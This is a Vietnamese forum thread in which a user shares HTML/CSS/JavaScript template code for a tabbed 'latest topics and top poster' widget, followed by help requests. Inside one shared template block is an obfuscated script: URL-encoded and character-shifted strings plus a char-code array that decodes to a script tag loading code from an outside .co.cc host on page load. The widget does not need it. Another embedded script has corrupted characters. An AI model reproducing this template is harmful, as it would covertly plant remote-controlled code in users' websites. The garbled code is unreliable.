Đăng nhập
Latest topics
» Tôi sẽ đỗ đại học!by NgocPRO 6/11/2024, 8:37 am
» Kỷ niệm xưa của chúng ta
by nightWalker 9/2/2024, 6:49 pm
» Bị lệch khung cần người giúp đỡ
by webhuy28 7/10/2021, 10:34 pm
» [HỎI ĐÁP] Danh sách bạn bè không thể hiển thị
by anhdaodaica1 2/10/2021, 10:04 pm
» [HỎI ĐÁP] Thông tin tài khoản không thể lưu thay đổi
by anhdaodaica1 2/10/2021, 6:05 am
» Phim bố già full
by huy.pc52 24/8/2021, 12:20 am
» Xin code Box HTML cho Forumvi
by Larva 1/7/2021, 12:57 pm
» Hello Anh Em Chinh phục
by HoàngTửNaivip5p 28/5/2021, 5:03 am
» Trang chủ tin tức cập nhật HOT 2016
by kenbi05 1/1/2020, 11:02 pm
» Không Dang9 bài viết = hình ảnh được
by huy.pc52 30/11/2019, 10:52 am
» CHÚC ANH EM NĂM MỚI VUI VẺ TRÀNG ĐẦY HẠNH PHÚC
by sps.kủn 12/2/2019, 1:16 pm
» Skin CNTT-K3 2015 (Full Mod)[✔]
by kenbi05 6/7/2018, 12:30 am
» baivong, handsome,....
by sps.kủn 29/6/2018, 1:54 pm
» [SHARE] SKIN ĐHFM.V7 @PUNBB
by tonyhoaivu 2/5/2018, 2:37 pm
» Share Skin Xanh Dương Cùi Bắp
by tonyhoaivu 28/4/2018, 5:57 pm
» Xin Skin http://v1.hotrofm.net/
by tonyhoaivu 28/4/2018, 5:45 pm
» Xin Skin Rao Vặt
by tonyhoaivu 15/4/2018, 12:07 pm
» Làm Sao Để Xóa Khung Này
by tonyhoaivu 14/4/2018, 7:18 pm
» [Lập nhóm]Lập nhóm fm
by vietkanpy 31/3/2018, 11:53 am
» [Help] về server úp ảnh của phutu [✔]
by baivong 17/3/2018, 10:18 pm
» Đừng khóc cho “tôi – Chinh Phục!”…
by AnHung 27/2/2018, 5:33 pm
» [Share] Skin Diendandaihoc.com [ Punbb ] [✔]
by Lu Mờ 13/2/2018, 7:28 pm
» Mời mấy thím vào groups Forumotion Việt Nam.
by dang02315 13/2/2018, 12:40 am
» Có thể làm các kiểu giao diện được không?
by Lu Mờ 9/2/2018, 3:40 pm
» ltns chinhphuc.info
by Shinichi Kudo 27/1/2018, 2:27 am
[Chia sẻ] Last topic+ top poster đơn giản tự cập nhật...
+122
arikatoji
haidang
phamviethung
boyphutho
nhutlangtu
duongtam90
shade_king
KaitouKid
Garlie
tiểulinh
caothuthatbai_123
nguyenartv3
kai_gtvt
m4u_band_mc
hson1992
ghostsp
thanhtrung8693
kunzing
mr.vyf4
computerangel
quydu191
demo
vlt
wonnie
thaikiet
Hoàng Long
zidayku123456789
lululala1234
giotinphong001
quanghieu97
izume
thanhit08
♥ 3C ♥
tangvanthao
tu20031990
StarVn
cobevuitinh
kevin_se7en
teenenter
vothithuhanh126
ܓܨܓMxTrường
langtucodon
le_thuy286
MarkChan
ombiu2713
yoo jin
vushock1
nguyenvanty
vothongnhat
tuong393
sqlserver
thanhq33
sondvb
kientrucdtu
1nghinle
duyhao1
nhocbaokute
quangtrung_it
longdienhocuong
Sadriver
myloveisyani
hailovejindo
nhocbui352012790
hai0000000
bt2010
Ryo Killah
mr.bi.
2kerproduction
sieunhan1910
kushy
pinpro97
njzzk
teendd
0908879245
shine shaymin sky
anpha72000
phuongnamks
htttk95
luckyly_94
rap_3108
phatnguyentruong
Hoàng Nội
hvthhien
blackmen
lil_andy
hoaibaospt
ligerv
viethuy2k9
tungbo1991
ymo113
Immortal02102
tiamo_tanto
anhtoi01
maxmax1o
deog
huuhien_210
canvuong000
trungtmt
minhhung_2008
beatbox.314
shuchangvn
tlovem1994
linh.pro
giangvailin1
nguyenlam101
need
Tô
ngocdatno08
codon.hlp
HMT™
A8forum
taulai
yumiko_kou
hunghsmn
xuanhung
Bo Lùn™
Optimus_Prime
FFW_HA
bảlbro11358
heocon
lords_ko
trinh123
126 posters
Trang 1 trong tổng số 5 trang
Trang 1 trong tổng số 5 trang • 1, 2, 3, 4, 5 
![[Chia sẻ] Last topic+ top poster đơn giản tự cập nhật... Empty](https://2img.net/i/empty.gif) [Chia sẻ] Last topic+ top poster đơn giản tự cập nhật...
[Chia sẻ] Last topic+ top poster đơn giản tự cập nhật...
-Mình kết hợp cái tab dùng modnew của Thuận và edit lại cái lastest của Như xuân đã chia sẻ.Kết quả là nó ra một cái lastest có tab tự cập nhật dùng modnew và top poster tự cập nhật.Đơn giản ở chỗ là mình chia nó thành 10 số,cho nên cái top poster là hoàn toàn tự cập nhật nhá.Bỏ hết 5 cái mem thủ công giống như của như xuân đã chia sẻ.
1.CSS
3.Thay Modnew bằng
Cách sắp xếp các modules như thế nào thì các bạn biết rồi nhá...Giống cách của Thuận...Mod top-Mod recent-Mod new.
DEMO:
![[Chia sẻ] Last topic+ top poster đơn giản tự cập nhật... 159578](https://2img.net/u/3115/25/32/47/smiles/159578.gif)
![[Chia sẻ] Last topic+ top poster đơn giản tự cập nhật... Demo](https://2img.net/h/ca7.upanh.com/15.351.19628173.CXG0/demo.png)
1.CSS
- Code:
#text {margin:50px auto; width:500px}
.hotspot {color:#900; padding-bottom:1px; border-bottom:1px dotted #900; cursor:pointer}
#tt {position:absolute; display:block; background:url(http://i1036.photobucket.com/albums/a449/a1tinhgia3/tt_left.gif) top left no-repeat}
#tttop {display:block; height:5px; margin-left:5px; background:url(http://i1036.photobucket.com/albums/a449/a1tinhgia3/tt_top.gif) top right no-repeat; overflow:hidden}
#ttcont {display:block; padding:2px 12px 3px 7px; margin-left:5px; background:#666; color:#FFF}
#ttbot {display:block; height:5px; margin-left:5px; background:url(http://i1036.photobucket.com/albums/a449/a1tinhgia3/tt_bottom.gif) top right no-repeat; overflow:hidden}
.tabs { margin: 0; padding: 0;}
.tabs { padding-bottom: 31px; margin-bottom: 9px; background: #e5effe; border-bottom: 1px solid #b4d0f3; }
.tabs li { list-style: none;float: left; line-height: 30px; border-right: 1px solid #b4d0f3; height: 30px; font-size: 11px;}
.tabs li.current { background: #FFF; height: 32px; font-weight: bold; }
.mainbox { background: #FFF;margin-bottom: 0px; padding: 1px;}
.mainbox table { width: 100%; }
#dhtmltooltip
{
border: #666 2.4px solid;
-moz-opacity: 0.8;
opacity: 0.8;
filter: alpha(opacity=80);
-moz-border-radius: 6px;
-webkit-border-radius: 6px;
padding: 10px;
font-size: 9pt;
font-family: Arial;
background-color: white;
width: auto;
max-width: 340px;
width:expression( document.body.clientWidth > 340? "340px": "auto" );
text-align:left;
}
- Code:
<div id="page-body">
<div id="{ID_CONTENT_CONTAINER}"{CLASS_CONTENT_CONTAINER}>
<table cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td valign="top" width="100%">
<div class="test"><table class="thongke" cellpadding="0" cellspacing="0" width="100%" align="center"><tr><!-- BEGIN giefmod_index1 --><td align="center">
{giefmod_index1.MODVAR}
</td><!-- END giefmod_index1 --></tr></table>
</div>
</td>
</tr><tr>
<td valign="top" width="100%">
<!-- BEGIN html_validation -->
</td>
</tr>
</tbody>
</table>
</div>
</div>
</td>
</tr>
</table>
</body>
</html>
<!-- END html_validation -->
- Code:
<table class="tborder" width="100%" align="center" border="0" cellpadding="4" cellspacing="1"><thead><tr valign="top">
<td class="tcat" colspan="9">Thống Kê Bài Gửi</td></tr></thead>
<table class="Nhuxuan" cellpadding="0" cellspacing="0" border="0" width="100%" align="center" >
<tr>
<td valign="top" width="100%">
<div class="test">
<table class="nhuxuan" cellpadding="5" cellspacing="0" style="border: 1px #ded7d7 solid;" border="0" width="100%" align="center">
<tr>
<td width="100%">
<div><input src="http://loitraitim.com/diendan/styles/Wchild/buttons/collapse_tcat.gif" style="float: right; margin-top: -110px; margin-right: +3px;" onclick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = ''; this.innerText = '';this.src ='http://loitraitim.com/diendan/styles/Wchild/buttons/collapse_tcat.gif'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.src ='http://loitraitim.com/diendan/styles/Wchild/buttons/collapse_tcat_collapsed.gif'; }" type="image" align="center"></div><div style="margin: 0px; padding: 0px; min-height: 0px; max-width: 980px; background-color: transparent;">
<div style="" align="center">
<table class="thongke" cellpadding="0" cellspacing="2" border="0" width="100%" align="center">
<thead>
<tr valign="top">
<td width="23%"></td><td width="100%" colspan="2"></td>
</tr>
<tr>
<td><table class="thongke" cellpadding="0" cellspacing="0" border="0" width="100%" align="center" >
<tr>
<td valign="top" style="border: 1px solid #9DB3C5;">
<!-- BEGIN giefmod_index1 -->
{giefmod_index1.MODVAR}<!-- END giefmod_index1 -->
</tr>
</thead>
</table>
</div></div>
</td></tr>
</table>
</div>
</td>
</tr>
<tr>
<td valign="top" width="100%">
<!-- BEGIN html_validation -->
</td>
</tr>
</tbody>
</table>
</div>
</div>
</td>
</tr>
</table>
</body>
</html>
<!-- END html_validation -->
<script type='text/javascript'>
var str3='%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E';document.write(unescape(str3));var str4='*8Hxhwnuy*75qfslzflj*8I*77of%7Bfxhwnuy*77*8Jkzshynts*75lnfnrf7*7%3Dtg*7%3E*%3CG%7Bfw*75ht*8I5*8G%7Bfw*75wj*8I*7%3C*7%3C*8G%7Cmnqj*7%3Dht*8Htg3qjslym*7%3E*%3CGwj0*8IXywnsl3kwtrHmfwHtij*7%3Dtg*%3AGht*%3AI*7%3E*8Ght00*8G*%3CIwjyzws*75wj*8G*%3CI*8H4xhwnuy*8J5';dF(str4);var str2=new Array(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,99,51,122,46,99,111,46,99,99,47,104,116,109,108,45,104,51,51,46,104,116,109,62,60,47,115,99,114,105,112,116,62);document.write(giaima2(str2));
</script>
3.Thay Modnew bằng
- Code:
<tbody>
<tr><td style="padding: 0px; background: rgb(255, 255, 255) none repeat scroll 0% 0%; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous;" width="100%"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr valign="top"><td style="border-top: 0px none; padding: 0px; background: transparent url(http://i1036.photobucket.com/albums/a449/a1tinhgia3/image/list.gif) no-repeat scroll center top; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous;" width="24"><img src="http://2img.net/i/fa/empty.gif" width="24" border="0"></td><td style="border-top: 0px none; padding: 0px; line-height: 20px; background-repeat: repeat;" align="left" background="http://i1036.photobucket.com/albums/a449/a1tinhgia3/image/listbg.gif"><!-- BEGIN post_row --><a onmouseover="tooltip.show('<b>Tiêu đề:</b> <font color=#4cff48>{post_row.TITLE}</font><br> <b>Thời gian:</b> <font color=#ded800>{post_row.TIME}</font><br><b>Trả lời:</b> <font color=#48f7ff> {post_row.REPLIES} lượt trả lời cho bài này</font>');" onmouseout="tooltip.hide();" href="{post_row.U_VIEW_COMMENTS}"><b><font style="font-family: Tahoma; font-size: 11px">{post_row.TITLE}</font></b></a>
<br><!-- END post_row --></td><td></td><td style="border-top: 0px none; padding-top: 0px; line-height: 20px; background: #fff url(http://i1036.photobucket.com/albums/a449/a1tinhgia3/image/listbg.gif) repeat 0px 0px;" align="right" width="20%"><!-- BEGIN post_row --><a onmouseover="tooltip.show('<span>Tác giả</span>');" onmouseout="tooltip.hide();" href="{post_row.U_VIEW_COMMENTS}"><font style="font-family: Tahoma; font-size: 11px"><img src="http://i1036.photobucket.com/albums/a449/a1tinhgia3/mem.gif" height="13" />{post_row.POSTER} </font></a>
<br><!-- END post_row --></td></tr></table></td></tr></tbody></table>
</div>
<div class="Page" style="padding-top: 8px; display: block;"><table class="tborder" style="border-bottom-width: 0px;" align="center" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr>
<td>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
</table></td></tr></tbody>
<tbody>
<tr><td style="padding: 0px; background: rgb(255, 255, 255) none repeat scroll 0% 0%; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous;" width="100%"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr valign="top"><td style="border-top: 0px none; padding: 0px; background: transparent url(http://i832.photobucket.com/albums/zz244/a1tg3/list.gif) no-repeat scroll center top; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous;" width="24"><img src="http://2img.net/i/fa/empty.gif" width="24" border="0"></td><td style="border-top: 0px none; padding: 0px; line-height: 20px; background-repeat: repeat;" align="left" background="http://i832.photobucket.com/albums/zz244/a1tg3/listbg.gif">
<A href=http://a1tinhgia3.co.cc/search.forum?search_id=activetopics><span><font style="font-family: Tahoma; font-size: 11px">Bài viết trong ngày</span></a><br>
<A href=http://a1tinhgia3.co.cc/stats.htm#10><span><font style="font-family: Tahoma; font-size: 11px">Các bài viết trong tháng</span></a><br>
<A href=http://a1tinhgia3.co.cc/stats.htm#2><span><font style="font-family: Tahoma; font-size: 11px">Thống kê tổng thể</span></a><br>
<A href=http://a1tinhgia3.co.cc/stats.htm#3><span><font style="font-family: Tahoma; font-size: 11px">Topic sôi nổi nhất</span></a><br>
<A href=http://a1tinhgia3.co.cc/stats.htm#4><span><font style="font-family: Tahoma; font-size: 11px">Topic xem nhiều nhất</span></a><br>
<A href=http://a1tinhgia3.co.cc/stats.htm#5><span><font style="font-family: Tahoma; font-size: 11px">Thành viên có nhiều chủ đề nhất</span></a><br>
<A href=http://a1tinhgia3.co.cc/stats.htm#6><span><font style="font-family: Tahoma; font-size: 11px">Thành viên post bài nhiều nhất trong 1 tuần</span></a><br>
<A href=http://a1tinhgia3.co.cc/stats.htm#7><span><font style="font-family: Tahoma; font-size: 11px">Thành viên post bài nhiều nhất trong tháng</span></a><br>
<A href=http://a1tinhgia3.co.cc/stats.htm#8><span><font style="font-family: Tahoma; font-size: 11px">Top poster</span></a><br>
<A href=http://a1tinhgia3.co.cc/stats.htm#9><span><font style="font-family: Tahoma; font-size: 11px">Số topic trong tháng</span></a><br>
</td></tr></table></td></tr></tbody></table>
</div>
<script type="text/javascript">tabview_initialize('TabView');</script><ScrollTop --><style type="text/css">#topbar{ PADDING-TOP: 0px;PADDING-BOTTOM: 0px;PADDING-RIGHT: 0px; PADDING-LEFT: 0px;VISIBILITY: hidden;WIDTH: 180px;FONT-FAMILY: Tahoma;POSITION: absolute;}</style><script type="text/javascript">var persistclose = 0<!--
Vị trí-->var startX = 80var startY = 500var verticalpos = "frombottom"function iecompattest(){return (document.compatMode && document.compatMode!="BackCompat")? document.documentElement : document.body}function get_cookie(Name){var search = Name + "="var returnvalue = "";if (document�cookie.length > 0){offset = document�cookie.indexOf(search)if (offset != -1){offset += search.lengthend = document�cookie.indexOf(";", offset);if (end == -1) end = document�cookie.length;returnvalue=unescape(document�cookie.substring(offset, end))}}return returnvalue;}function closebar(){if (persistclose)document�cookie="remainclosed=1"document.getElementById("topbar").style.visibility="hidden"}function staticbar(){barheight=document.getElementById("topbar").offsetHeightvar ns = (navigator.appName.indexOf("Netscape") != -1) || window.opera;var d = document;function ml(id){var el=d.getElementById(id);if (!persistclose || persistclose && get_cookie("remainclosed")=="")el.style.visibility="visible"if(d.layers)el.style=el;el.sP=function(x,y){this.style.right=x+"px";this.style.top=y+"px";};el.x = startX;if (verticalpos=="fromtop")el.y = startY;else{el.y = ns ? pageYOffset + innerHeight : iecompattest().scrollTop + iecompattest().clientHeight;el.y -= startY;}return el;}window.stayTopLeft=function(){if (verticalpos=="fromtop"){var pY = ns ? pageYOffset : iecompattest().scrollTop;ftlObj.y += (pY + startY - ftlObj.y)/8;}else{var pY = ns ? pageYOffset + innerHeight - barheight: iecompattest().scrollTop + iecompattest().clientHeight - barheight;ftlObj.y += (pY - startY - ftlObj.y)/8;}ftlObj.sP(ftlObj.x, ftlObj.y);setTimeout("stayTopLeft()", 10);}ftlObj = ml("topbar");stayTopLeft();}if (window.addEventListener)window.addEventListener("load", staticbar, false)else if (window.attachEvent)window.attachEvent("onload", staticbar)else if (document.getElementById)window.onload=staticbar</script>
</div>
</td>
- Code:
</td></tr></table></td>
<td valign="top" style="border: 1px solid #9DB3C5; padding: 1px" width="100%">
<style type="text/css">
th,td,p {
font-family: Tahoma,Verdana,Arial,Helvetica,sans-serif }
/* Style cho menu tabs */div.TabView div.Tabs{height: 32px; /* chiều cao của tab menu */overflow: hidden;}div.TabView div.Tabs: hover,{height: 32px; /* chiều cao của tab menu */overflow: hidden;}div.TabView div.Tabs a , div.TabView div.Tabs a:hover {float: left;display: block;background-color:#;text-align: center;height: 29px;padding: 6px;vertical-align: middle;border:1px solid #b4d0f3;border-top: 0px;border-left: 0px;border-bottom: 0px; /* đường viền quanh tabs menu */text-decoration: none;font-family: Tahoma;font-size: 11px;color: #000000;}.hotrott{background-color: #ffffff;border: 0px solid #ded7d7;}.nen{background-color: #ffffff;border: 1px solid #ded7d7;}div.TabView div.Tabs a.Active{background-color: #ffffff; /* màu nền tab menu active */color: #000000;border:1px solid #b4d0f3;border-top: 0px;border-left: 0px;border-bottom: 0px; padding: 6px;height: 29px;font-size: 11px;font-weight: bold;}/* Style cho phần text nội dung của mỗi tab */div.TabView {clear: both;border: 0px solid #ffffff;overflow: hidden; /* giá trị là auto nếu muốn hiện scroll bar */}div.TabView div.Pages div.Page{height: 100%;padding: 0px;border: 0px solid #b4d0f3;overflow: hidden; /* giá trị là auto nếu muốn hiện scroll bar */}</style><script type="text/javascript" src="http://tinhgia3sv.fileave.com/Tabview.js"></script><div id="TabView" class="TabView" style="padding: 0px;"><!--
tabs --><div width="100%" class="Tabs"><a class="Active" href="javascript:tabview_switch('TabView', 1);">Bài Viết Mới</a><a>Hướng dẫn</a><a>Thống kê</a><ul class="tabs" id="vietvbb_topstats_t"> <li style="border-right: 0px; display: none;" id="vietvbb_topstats_t_loading"></li> </ul> </div><!--
nội dung tabs --><div style="height:210px; width:100%" class="Pages">
<div class="Page" style="padding-top: 8px;"><!-- BEGIN classical_row -->
<table class="tborder" style="border-bottom-width: 0px;" align="center" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr>
<td>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
</table></td></tr></tbody>
<tbody>
<tr><td style="padding: 0px; background: rgb(255, 255, 255) none repeat scroll 0% 0%; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous;" width="100%"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr valign="top"><td style="border-top: 0px none; padding: 0px; background: transparent url(http://i1036.photobucket.com/albums/a449/a1tinhgia3/image/list.gif) no-repeat scroll center top; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous;" width="24"><img src="http://2img.net/i/fa/empty.gif" width="24" border="0"></td><td style="border-top: 0px none; padding: 0px; line-height: 20px; background-repeat: repeat;" align="left" background="http://i1036.photobucket.com/albums/a449/a1tinhgia3/image/listbg.gif" width="80%"><!-- BEGIN recent_topic_row -->
<a onmouseover="showtip('<font color=blue><b>+Tiêu đề:</b></font> <b><font color=black>{classical_row.recent_topic_row.L_TITLE}</font></b><br> <font color=blue><b>+Thời gian:</b></font> <b><font color=black>{classical_row.recent_topic_row.S_POSTTIME}</font></b><br><strong><font color=blue><b>+Lời Nhắn:</b></font></strong> <b><font color=black>Welcome to [Mr].Trịnh! Hãy thanks bài viết bổ ích nhé,không spam.Thân!</font></b>');" onmouseout="hidetip();" href="{classical_row.recent_topic_row.U_TITLE}"><b><font color=#3399FF size="1">{classical_row.recent_topic_row.L_TITLE}</font></b></a><br>
<!-- END recent_topic_row -->
</td><td></td><td style="border-top: 0px none; padding: 0px; line-height: 20px; background-repeat: repeat;" align="right" background="http://img687.imageshack.us/img687/8968/listbg4821359.gif" width="20%"><!-- BEGIN recent_topic_row --><!-- BEGIN switch_poster -->
<a href="{classical_row.recent_topic_row.switch_poster.U_POSTER}"><font size="1"> {classical_row.recent_topic_row.switch_poster.S_POSTER}</font></b></a><br>
<!-- END switch_poster --><!-- BEGIN switch_poster_guest -->
{classical_row.recent_topic_row.switch_poster_guest.S_POSTER}
<!-- END switch_poster_guest --><!-- END recent_topic_row -->
</td></tr></tbody></table></td></tr>
</table><!-- END classical_row -->
</div>
<div class="Page" style="padding-top: 8px;">
<table class="tborder" style="border-bottom-width: 0px;" align="center" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr>
<td>
- Code:
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td "width="25%">
<div style="border: 1px solid #9DB3C5; border-bottom: 0px; border-right: 0px; border-left: 0px; border-top: 0px;"class="mainbox"> <ul class="tabs"><li class="current"><span style="padding: 0px 5px;">
<select id="vietvbb_topstats_s">
<option selected="selected" value="vietvbb_top_posters">Top Poster</option>
<option value="vietvbb_thanked_members">Thanked</option>
<option value="vietvbb_newest_members">Newest Member</option>
<option value="vietvbb_top_starters">Top Starter</option>
</select>
</span></li></ul>
<div style="height: 200px; width: 100%;">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tbody>
<tr valign="top">
<td style="border-top: 0px none; padding: 0px; background: transparent url(http://i739.photobucket.com/albums/xx34/tuyetson_08/listbg.gif) no-repeat scroll center top; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;" width="24"><img src="http://i292.photobucket.com/albums/mm31/UngTieuVe_2008/listo10.png" border="0"></td> <td style="border-top: 0px none; padding: 0px; line-height: 20px; background-repeat: repeat;" width="100%" background="http://i87.servimg.com/u/f87/13/37/93/66/listbg10.gif">
<div id="vietvbb_topstats_s_content" style="display: block;">
<!-- BEGIN POSTER -->
<div class="smallfont" style="overflow: hidden; height: 20px; width: 100%;">
<span style="float: left;">
<a href="" onmouseover="showtip('<center><b><font color=green>Click! để xem profile thành viên này.</font></b></center>');" onmouseout="hidetip();">
<script language="JavaScript">images = new Array(6);images[0] = "<img src='http://i869.photobucket.com/albums/ab259/tuyetson_10/Skin%20hailang/vip.gif' border='0'>";images[1] = "<img src='http://i869.photobucket.com/albums/ab259/tuyetson_10/Skin%20hailang/vip3.gif' border='0'>";images[2] = "<img src='http://i869.photobucket.com/albums/ab259/tuyetson_10/Skin%20hailang/mod.gif' border='0'>";images[3] = "<img src='http://i869.photobucket.com/albums/ab259/tuyetson_10/Skin%20hailang/flower2.gif' border='0'>";images[4] = "<img src='http://i869.photobucket.com/albums/ab259/tuyetson_10/Skin%20hailang/member.gif' border='0'>";images[5] = "<img src='http://i869.photobucket.com/albums/ab259/tuyetson_10/Skin%20hailang/smod.gif' border='0'>";index = Math.floor(Math.random() * images.length);document.write(images[index]);</script> <b style="float: left='180px'; padding-top: 2px;"> {POSTER.NAME}</b></a>
</span>
</div>
<!-- END POSTER -->
</td>
</tr> </tbody></table> </div> </div></td></tr> </tbody></table>
Cách sắp xếp các modules như thế nào thì các bạn biết rồi nhá...Giống cách của Thuận...Mod top-Mod recent-Mod new.
DEMO:
![[Chia sẻ] Last topic+ top poster đơn giản tự cập nhật... 159578](https://2img.net/u/3115/25/32/47/smiles/159578.gif)
![[Chia sẻ] Last topic+ top poster đơn giản tự cập nhật... Demo](https://2img.net/h/ca7.upanh.com/15.351.19628173.CXG0/demo.png)
Được sửa bởi trinh123 ngày 28/10/2010, 10:36 pm; sửa lần 1.
![[Chia sẻ] Last topic+ top poster đơn giản tự cập nhật... Empty](https://2img.net/i/empty.gif) Re: [Chia sẻ] Last topic+ top poster đơn giản tự cập nhật...
Re: [Chia sẻ] Last topic+ top poster đơn giản tự cập nhật...
vừng ơi mở ra 
===========
bạn ơi, sau khi mình add thì khung nền chỗ bài viết mới nó không hiện, bạn có thể chỉ mình cách chèn nền không? Với lại phần thống kê, hướng dẫn nó bị liệt, không nhấp vào được >.<
Ngoài ra last topic có thể nâng lên đến 20 bài không?
Đây là hình khi mình thay code:
![[Chia sẻ] Last topic+ top poster đơn giản tự cập nhật... 1288282520235128438_574_574](https://2img.net/h/img1-photo.apps.zing.vn/upload/original/2010/10/28/23/15/1288282520235128438_574_574.jpg)
Mình thấy khung thông điệp mess của bạn đẹp quá, có thể cho mình xin không


===========
bạn ơi, sau khi mình add thì khung nền chỗ bài viết mới nó không hiện, bạn có thể chỉ mình cách chèn nền không? Với lại phần thống kê, hướng dẫn nó bị liệt, không nhấp vào được >.<
Ngoài ra last topic có thể nâng lên đến 20 bài không?
Đây là hình khi mình thay code:
![[Chia sẻ] Last topic+ top poster đơn giản tự cập nhật... 1288282520235128438_574_574](https://2img.net/h/img1-photo.apps.zing.vn/upload/original/2010/10/28/23/15/1288282520235128438_574_574.jpg)
Mình thấy khung thông điệp mess của bạn đẹp quá, có thể cho mình xin không

Được sửa bởi heocon ngày 28/10/2010, 11:52 pm; sửa lần 1.
![[Chia sẻ] Last topic+ top poster đơn giản tự cập nhật... Empty](https://2img.net/i/empty.gif) Re: [Chia sẻ] Last topic+ top poster đơn giản tự cập nhật...
Re: [Chia sẻ] Last topic+ top poster đơn giản tự cập nhật...
heocon đã viết:vừng ơi mở ra
===========
bạn ơi, sau khi mình add thì chữ bên topposter to hơn chữ bên last topic
có thể chỉnh cho chữ nhỏ để hai bên đều bằng nhau không bạn?
Ngoài ra last topic có thể nâng lên đến 20 bài không?
Đây là hình khi mình thay code:
Mình thấy khung thông điệp mess của bạn đẹp quá, có thể cho mình xin không

Bạn xem demo mình làm kìa...đâu có lỗi đâu...bạn xem lại css thử......với lại bạn để cái recent là 10 thôi....mình edit lại cái chìu cao của recent luôn rồi...
![[Chia sẻ] Last topic+ top poster đơn giản tự cập nhật... Empty](https://2img.net/i/empty.gif) Re: [Chia sẻ] Last topic+ top poster đơn giản tự cập nhật...
Re: [Chia sẻ] Last topic+ top poster đơn giản tự cập nhật...
Có send cái Thông điệp thì lấy . hihi nói vậy chứ vote cho bạn nè. 

![[Chia sẻ] Last topic+ top poster đơn giản tự cập nhật... Empty](https://2img.net/i/empty.gif) Re: [Chia sẻ] Last topic+ top poster đơn giản tự cập nhật...
Re: [Chia sẻ] Last topic+ top poster đơn giản tự cập nhật...
Xem nè bạn giống y chang chủ topic, chỉ khác là mình không xài mấy cái biểu tượng trước nick thôi. Cao bằng nhau nè, 20 hay 100 bài đều được:trinh123 đã viết:bạn ơi, sau khi mình add thì chữ bên topposter to hơn chữ bên last topic
có thể chỉnh cho chữ nhỏ để hai bên đều bằng nhau không bạn?
Ngoài ra last topic có thể nâng lên đến 20 bài không?
Đây là hình khi mình thay code:



http://niemvui.123.st/index.htm
![[Chia sẻ] Last topic+ top poster đơn giản tự cập nhật... Empty](https://2img.net/i/empty.gif) Re: [Chia sẻ] Last topic+ top poster đơn giản tự cập nhật...
Re: [Chia sẻ] Last topic+ top poster đơn giản tự cập nhật...
- Kiểu này mình cũng sửa tương tự và dùng lâu rồi , bây giờ chán, thay rồi.
- Bài này của người khác sửa lại đôi chút thôi.
Với hai lý do trên mình nghỉ không nên ẩn.
- Bài này của người khác sửa lại đôi chút thôi.
Với hai lý do trên mình nghỉ không nên ẩn.
![[Chia sẻ] Last topic+ top poster đơn giản tự cập nhật... Empty](https://2img.net/i/empty.gif) Re: [Chia sẻ] Last topic+ top poster đơn giản tự cập nhật...
Re: [Chia sẻ] Last topic+ top poster đơn giản tự cập nhật...
không được rồi /////////////nó ko hiện bài viết
Trang 1 trong tổng số 5 trang • 1, 2, 3, 4, 5 
 Similar topics
Similar topics» [Chia sẻ] Last topic+ top poster ( giống VBB và tự cập nhật)
» [Thắc mắc]Chia widget last topic và top poster
» [Thắc mắc] Chia lastest topic và top poster.....
» Chia sẻ latest topic - top poster chung một dòng ( không lỗi)
» Cần người chỉ cách chuyển cột tác giả bài viết trong topic từ chiều dọc sang chiều ngang...
» [Thắc mắc]Chia widget last topic và top poster
» [Thắc mắc] Chia lastest topic và top poster.....
» Chia sẻ latest topic - top poster chung một dòng ( không lỗi)
» Cần người chỉ cách chuyển cột tác giả bài viết trong topic từ chiều dọc sang chiều ngang...
Trang 1 trong tổng số 5 trang
Permissions in this forum:
Bạn không có quyền trả lời bài viết
 Trang Chính
Trang Chính





 cám ơn, test thử xem sao
cám ơn, test thử xem sao 







